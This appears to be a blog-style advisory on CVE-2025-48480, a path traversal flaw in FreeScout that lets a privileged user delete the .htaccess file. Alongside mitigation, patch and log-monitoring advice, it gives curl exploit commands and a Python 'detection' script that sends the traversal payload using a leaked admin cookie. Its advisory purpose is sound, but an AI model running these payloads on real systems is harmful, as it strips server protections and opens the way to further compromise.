FreeScout, Path Traversal Vulnerability, CVE-2025-48480 (Critical)

By /

Listen to this Post

How the CVE Works

CVE-2025-48480 is a critical path traversal vulnerability in FreeScout (prior to v1.8.180). An authenticated administrator or user with `User::PERM_EDIT_USERS` privileges can exploit this flaw by manipulating the avatar upload path. By setting the avatar path to `../.htaccess` during user creation and later deleting the avatar, the attacker forces the system to delete the `.htaccess` file in /storage/app/public. This can disable security restrictions, leading to unauthorized access, directory listing, or further server compromise. The vulnerability stems from insufficient path sanitization during file deletion.

DailyCVE Form

Platform: FreeScout
Version: <1.8.180
Vulnerability: Path Traversal
Severity: Critical
Date: 06/04/2025

Prediction: Patch expected by 06/15/2025

What Undercode Say:

Analytics:

  • Exploitable via low-privilege admin accounts.
  • Impacts Apache/Nginx configurations relying on .htaccess.
  • Attack chain: Upload → Delete → Bypass security.

Exploit Commands:

1. Craft Malicious Request:

curl -X POST 'https://<target>/users/create' -d 'avatar=../.htaccess' -H 'Cookie: <admin_session>'

2. Trigger Deletion:

curl -X DELETE 'https://<target>/users/avatar/delete' -H 'Cookie: <admin_session>'

Mitigation Commands:

1. Immediate Workaround:

chattr +i /storage/app/public/.htaccess

2. Patch Verification:

grep -r "realpath" /var/www/freescout/app/Http/Controllers/UserController.php

Code Fix (Patch Analysis):

// Before (Vulnerable):
unlink(storage_path('app/public/' . $user->avatar));
// After (Patched):
$avatarPath = realpath(storage_path('app/public/' . $user->avatar));
if (strpos($avatarPath, storage_path('app/public')) !== false) {
unlink($avatarPath);
}

Detection Script:

import requests
target = "http://<freescout_host>"
session = requests.Session()
session.cookies.update({"session_id": "<leaked_admin_cookie>"})
response = session.post(f"{target}/users/create", data={"avatar": "../.htaccess"})
if response.status_code == 200:
print("[!] Vulnerable to CVE-2025-48480")

Post-Exploit Impact:

  • Disabled `.htaccess` allows arbitrary file uploads.
  • Potential RCE via `.user.ini` manipulation.

Permanent Fix:

  • Upgrade to FreeScout v1.8.180+.
  • Audit user privileges.

Log Monitoring:

tail -f /var/log/apache2/access.log | grep "POST /users/create"

Threat Indicators:

  • Unusual `.htaccess` deletion logs.
  • Admin users creating/deleting avatars rapidly.

End of Report.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top